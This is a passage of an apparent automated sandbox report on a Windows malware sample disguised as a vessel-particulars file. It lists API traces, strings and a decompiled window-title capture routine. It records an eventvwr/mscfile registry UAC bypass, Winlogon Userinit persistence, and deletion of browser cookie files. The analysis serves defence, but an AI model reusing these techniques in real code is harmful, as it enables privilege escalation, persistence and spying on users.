                                            • Part of subcall function 0040EFB5: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491), ref: 0040EFF1
                                            • Part of subcall function 0040EFB5: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0040F00F
                                            • Part of subcall function 0040EFB5: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F019
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F022
                                            • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F037
                                            • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F044
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F096
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F09F
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F0A8
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,00000000), ref: 0040616C
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,fundlldata), ref: 00406181
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 00406199
                                            • Part of subcall function 004052EC: CreateFileMappingA.KERNEL32 ref: 0040530E
                                            • Part of subcall function 004052EC: MapViewOfFileEx.KERNEL32(00000000,00000002,00000000,00000000,00000000,00000000,?,0040BBF3,00000000), ref: 0040531D
                                            • Part of subcall function 004052EC: CloseHandle.KERNEL32(00000000,?,0040BBF3,00000000), ref: 00405326
                                            • Part of subcall function 0040EDD3: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDE3
                                            • Part of subcall function 0040EDD3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(004118A0,00000000,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDF4
                                            • Part of subcall function 0040EDD3: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDFD
                                            • Part of subcall function 0040EDD3: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE0A
                                            • Part of subcall function 0040EDD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE15
                                            • Part of subcall function 0040EDD3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(hRA,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE34
                                            • Part of subcall function 0040EDD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE3D
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,funready,00415268,00000000,?,00415988,00000000,FunFunc), ref: 004061E0
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,?,00415988,00000000,FunFunc), ref: 004061EA
                                            • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                            • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00415988,00000000,FunFunc), ref: 004061FD
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00415988,00000000,FunFunc), ref: 00406206
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,funfunc), ref: 00406217
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 0040622B
                                          • atoi.MSVCRT ref: 00406232
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406244
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406255
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$V01@@$?length@?$basic_string@$?c_str@?$basic_string@D@2@@0@V?$basic_string@$G@2@@std@@G@std@@$??8std@@D@1@@FileHstd@@V12@$??4?$basic_string@?find@?$basic_string@?substr@?$basic_string@CloseCreateHandleMappingV01@V10@0@V10@@Viewatoi
                                          • String ID: FunFunc$fundlldata$funfunc$funready
                                          • API String ID: 298526877-738133096
                                          • Opcode ID: 65775b28cd64956663a998794ecdbee9d94c107cf5be0b532b6ba929ca3a8860
                                          • Instruction ID: a804b9d79a05e482a7dd7459e5937299dff8fe1282dbbe2cbe30763dd8b13e0d
                                          • Opcode Fuzzy Hash: 65775b28cd64956663a998794ecdbee9d94c107cf5be0b532b6ba929ca3a8860
                                          • Instruction Fuzzy Hash: BA313071900219ABCF04ABE1EC4E9EE7738FF45315B00447AF902B21D1DEB899948B59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • _EH_prolog.MSVCRT ref: 00401F3F
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 00401F79
                                          • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00415268,?,00415268,004151F0), ref: 00401FA0
                                            • Part of subcall function 0040ED35: _itoa.MSVCRT ref: 0040ED53
                                            • Part of subcall function 0040ED35: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040A186,?,00000000), ref: 0040ED67
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,camframe,00415268,00000000), ref: 00401FBD
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,00000000), ref: 00401FCA
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,00000000), ref: 00401FD7
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00401FE4
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401FF4
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401FFE
                                            • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                            • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402014
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040201D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402026
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040202F
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402038
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402041
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040204A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@0@$??0?$basic_string@$D@1@@$?size@?$basic_string@H_prologV01@@V10@@_itoa
                                          • String ID: camframe
                                          • API String ID: 870949895-3510102068
                                          • Opcode ID: a43983bfdcaf14fcd2b42adcbfdaf3f22dfe03c5b3eb4796a0df1330b370d15a
                                          • Instruction ID: abce0e248e8dab4f9b6b1d1c922dc1d07b2fbcfaebd547229da4bc85d70ff786
                                          • Opcode Fuzzy Hash: a43983bfdcaf14fcd2b42adcbfdaf3f22dfe03c5b3eb4796a0df1330b370d15a
                                          • Instruction Fuzzy Hash: FA313C72D0001DABCB04EBA0ED4A9EEBB78FB55315F14407AF506B2091EB795A58CB68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00408EF1: RegOpenKeyExA.KERNELBASE(80000002,?,00000000,00020019,80000002), ref: 00408F12
                                            • Part of subcall function 00408EF1: RegQueryValueExA.KERNELBASE(80000002,004075CB,00000000,00000000,?,00000400), ref: 00408F31
                                            • Part of subcall function 00408EF1: RegCloseKey.ADVAPI32(80000002), ref: 00408F3A
                                            • Part of subcall function 00408EF1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410668,?), ref: 00408F59
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,00415968,00000000,?,?,?,?,?,?,?,?,00407683), ref: 00402AA3
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,00415968,00000000,?,?,?,?,?,?,?,?,00407683), ref: 00402AAC
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,00415968,00000000,?,?,?,?,?,?,?,?,00407683), ref: 00402AB6
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,?,?,00415968,00000000,?,?,?,?,?,?,?,?,00407683), ref: 00402AC1
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,00000000,?,?,00415968,00000000,?,?,?,?,?,?,?,?,00407683), ref: 00402AD2
                                            • Part of subcall function 004090D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00415940), ref: 0040910B
                                            • Part of subcall function 004090D0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409127
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe,?), ref: 00402AF7
                                            • Part of subcall function 00408FDA: RegCreateKeyA.ADVAPI32(?,?,?), ref: 00408FE7
                                            • Part of subcall function 00408FDA: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(80000002,004157F8,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 00408FF6
                                            • Part of subcall function 00408FDA: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 00409000
                                            • Part of subcall function 00408FDA: RegSetValueExA.KERNELBASE(?,00000000,00000000,?,00000000,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 00409013
                                            • Part of subcall function 00408FDA: RegCloseKey.ADVAPI32(?,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040901E
                                            • Part of subcall function 00408FDA: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040902D
                                            • Part of subcall function 0040712F: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040713F
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00410668,00410668,00000000), ref: 00402B24
                                          • ShellExecuteA.SHELL32(00000000,open,00000000), ref: 00402B31
                                          • exit.MSVCRT ref: 00402B3D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402B46
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402B4F
                                          Strings
                                          • open, xrefs: 00402B2B
                                          • Software\Classes\mscfile\shell\open\command, xrefs: 00402AFE
                                          • eventvwr.exe, xrefs: 00402B09
                                          • origmsc, xrefs: 00402AC8
                                          • mscfile\shell\open\command, xrefs: 00402A86
                                          • C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe, xrefs: 00402AF2
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$?c_str@?$basic_string@$??0?$basic_string@??1?$basic_string@$D@1@@$?length@?$basic_string@CloseValue$?size@?$basic_string@CreateExecuteOpenQueryShellV01@@exit
                                          • String ID: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
                                          • API String ID: 467877216-1000135773
                                          • Opcode ID: efcaee221ccb235fb3a56bc498791cb5357aed51ff3e3774293c8f9fdcbfe5a9
                                          • Instruction ID: 983c3f54951dff303221dc85f48cadd06facc0e56af3ae634be6270d9a423c28
                                          • Opcode Fuzzy Hash: efcaee221ccb235fb3a56bc498791cb5357aed51ff3e3774293c8f9fdcbfe5a9
                                          • Instruction Fuzzy Hash: D6218E72900109ABC700ABA19D8EEFF777DDB84705F10406AF506A2191DAF85E85CBAD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000), ref: 00405D64
                                            • Part of subcall function 00408EF1: RegOpenKeyExA.KERNELBASE(80000002,?,00000000,00020019,80000002), ref: 00408F12
                                            • Part of subcall function 00408EF1: RegQueryValueExA.KERNELBASE(80000002,004075CB,00000000,00000000,?,00000400), ref: 00408F31
                                            • Part of subcall function 00408EF1: RegCloseKey.ADVAPI32(80000002), ref: 00408F3A
                                            • Part of subcall function 00408EF1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410668,?), ref: 00408F59
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00405D8B
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405D94
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00410668), ref: 00405DA3
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000104), ref: 00405DD0
                                          • ExpandEnvironmentStringsA.KERNEL32(00000000), ref: 00405DD7
                                          • PathFileExistsA.SHLWAPI(?), ref: 00405DE4
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],?), ref: 00405E1A
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405E67
                                            • Part of subcall function 0040F234: FindFirstFileA.KERNEL32(?,?,00415918,00410668,74B5FBA0), ref: 0040F2F5
                                          • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(00410CC4,00000000), ref: 00405E38
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],?), ref: 00405E54
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@D@1@@$??1?$basic_string@File$??4?$basic_string@??8std@@?c_str@?$basic_string@?find@?$basic_string@CloseD@2@@0@EnvironmentExistsExpandFindFirstOpenPathQueryStringsV01@V01@@V?$basic_string@Value
                                          • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                          • API String ID: 1627278905-4073444585
                                          • Opcode ID: 2694f6698a7aa59175af7fd993aba418089cd61275ab9121a9622683bf210f80
                                          • Instruction ID: ce9239a2887a28e7c3d3296c59a61411ed8d7c47a0aa921717fce0c83e46222a
                                          • Opcode Fuzzy Hash: 2694f6698a7aa59175af7fd993aba418089cd61275ab9121a9622683bf210f80
                                          • Instruction Fuzzy Hash: 17318471640109ABDB04EBA4DD5EAEF777CDB44314F504067E501B21D0EEB89A88CFAA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • getenv.MSVCRT ref: 00405701
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 0040570C
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00405717
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405722
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040572B
                                          • DeleteFileA.KERNEL32(00000000), ref: 00405732
                                          • GetLastError.KERNEL32 ref: 0040573C
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome Cookies not found],?,?,?,?,00000000), ref: 0040575D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000), ref: 00405770
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome Cookies found, cleared!],?,?,?,?,00000000), ref: 00405796
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000), ref: 004057AB
                                          Strings
                                          • [Chrome Cookies found, cleared!], xrefs: 00405791
                                          • [Chrome Cookies not found], xrefs: 00405758
                                          • UserProfile, xrefs: 004056FC
                                          • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 004056F6
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@$?c_str@?$basic_string@D@2@@0@DeleteErrorFileHstd@@LastV10@V?$basic_string@getenv
                                          • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                          • API String ID: 3740952235-304995407
                                          • Opcode ID: 51d6901ca4da6e011993bb39d6d9175aba19df33fb05b91d090322444a48c6c4
                                          • Instruction ID: 8dcf24351441a3668afb3d619d1a527b51a24c68bcaca8363eb68d31d9c31fe8
                                          • Opcode Fuzzy Hash: 51d6901ca4da6e011993bb39d6d9175aba19df33fb05b91d090322444a48c6c4
                                          • Instruction Fuzzy Hash: 9C118131640509AFD700ABE4DD4EAFE7778EB50305F504077E402E31D0EEB95A88CBAA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 30%
                                          			E0040F4A3(char _a4, void* _a20) {
                                          				char _v5;
                                          				void* _v24;
                                          				char _v40;
                                          				int _t26;
                                          				int _t29;
                                          				void* _t37;
                                          				unsigned int _t66;
                                          				signed int _t67;
                                          				int _t70;
                                          				signed short _t73;
                                          				struct HWND__* _t81;
                                          				void* _t83;
                                          
                                          				_t81 = GetForegroundWindow();
                                          				_t26 = GetWindowTextLengthA(_t81);
                                          				_t89 = _t26;
                                          				if(_t26 <= 0) {
                                          					L6:
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					return 0;
                                          				}
                                          				_t28 = _t26 + 1;
                                          				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z( &_v5);
                                          				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                          				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          				_t29 = GetWindowTextA(_t81, _t26 + 1, _t26 + 1);
                                          				__imp__?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ();
                                          				__imp__?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ();
                                          				__imp__?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ();
                                          				E00408667(_t29, _t29, _t29, __imp__tolower);
                                          				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                          				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                          				E0040EFB5(_t89,  &_v40,  &_a4, 0x4108ac,  &_v5, _t28, 0);
                                          				_t73 = 0;
                                          				if(E004012B5( &_v40) <= 0) {
                                          					L5:
                                          					E00401B3C( &_v40);
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					goto L6;
                                          				}
                                          				_t82 = 0;
                                          				while(1) {
                                          					_t37 = E00401289( &_v40, 0, _t82);
                                          					__imp__?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z(_t37, 0);
                                          					if(_t37 !=  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB) {
                                          						break;
                                          					}
                                          					_t73 = _t73 + 1;
                                          					_t82 = _t73 & 0x0000ffff;
                                          					if((_t73 & 0x0000ffff) < E004012B5( &_v40)) {
                                          						continue;
                                          					}
                                          					goto L5;
                                          				}
                                          				__eflags = _a20;
                                          				if(_a20 != 0) {
                                          					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          					asm("repne scasb");
                                          					_t66 =  !( &_v24 | 0xffffffff);
                                          					_t83 = _t37 - _t66;
                                          					_t67 = _t66 >> 2;
                                          					_t70 = memcpy(_a20, _t83, _t67 << 2) & 0x00000003;
                                          					__eflags = _t70;
                                          					memcpy(_t83 + _t67 + _t67, _t83, _t70);
                                          				}
                                          				E00401B3C( &_v40);
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				return 1;
                                          			}















                                          0x0040f4b1
                                          0x0040f4b4
                                          0x0040f4ba
                                          0x0040f4bc
                                          0x0040f593
                                          0x0040f596
                                          0x00000000
                                          0x0040f59c
                                          0x0040f4c5
                                          0x0040f4cd
                                          0x0040f4d6
                                          0x0040f4e0
                                          0x0040f4e8
                                          0x0040f4f7
                                          0x0040f501
                                          0x0040f50b
                                          0x0040f512
                                          0x0040f522
                                          0x0040f531
                                          0x0040f53b
                                          0x0040f546
                                          0x0040f54f
                                          0x0040f582
                                          0x0040f585
                                          0x0040f58d
                                          0x00000000
                                          0x0040f58d
                                          0x0040f551
                                          0x0040f553
                                          0x0040f559
                                          0x0040f562
                                          0x0040f570
                                          0x00000000
                                          0x00000000
                                          0x0040f572
                                          0x0040f576
                                          0x0040f580
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040f580
                                          0x0040f5a2
                                          0x0040f5a6
                                          0x0040f5ab
                                          0x0040f5b8
                                          0x0040f5ba
                                          0x0040f5c0
                                          0x0040f5c5
                                          0x0040f5cc
                                          0x0040f5cc
                                          0x0040f5cf
                                          0x0040f5cf
                                          0x0040f5d4
                                          0x0040f5dc
                                          0x0040f5e5
                                          0x00000000

                                          APIs
                                          • GetForegroundWindow.USER32(74B06490,00415940,?,?,?,?,?,?,?,?,0040E240), ref: 0040F4AB
                                          • GetWindowTextLengthA.USER32(00000000), ref: 0040F4B4
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?,?,?,?,?,?,?,?,?,0040E240), ref: 0040F4CD
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,0040E240), ref: 0040F4D6
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040E240), ref: 0040F4E0
                                          • GetWindowTextA.USER32 ref: 0040F4E8
                                          • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,?,?,?,?,?,?,?,0040E240), ref: 0040F4F7
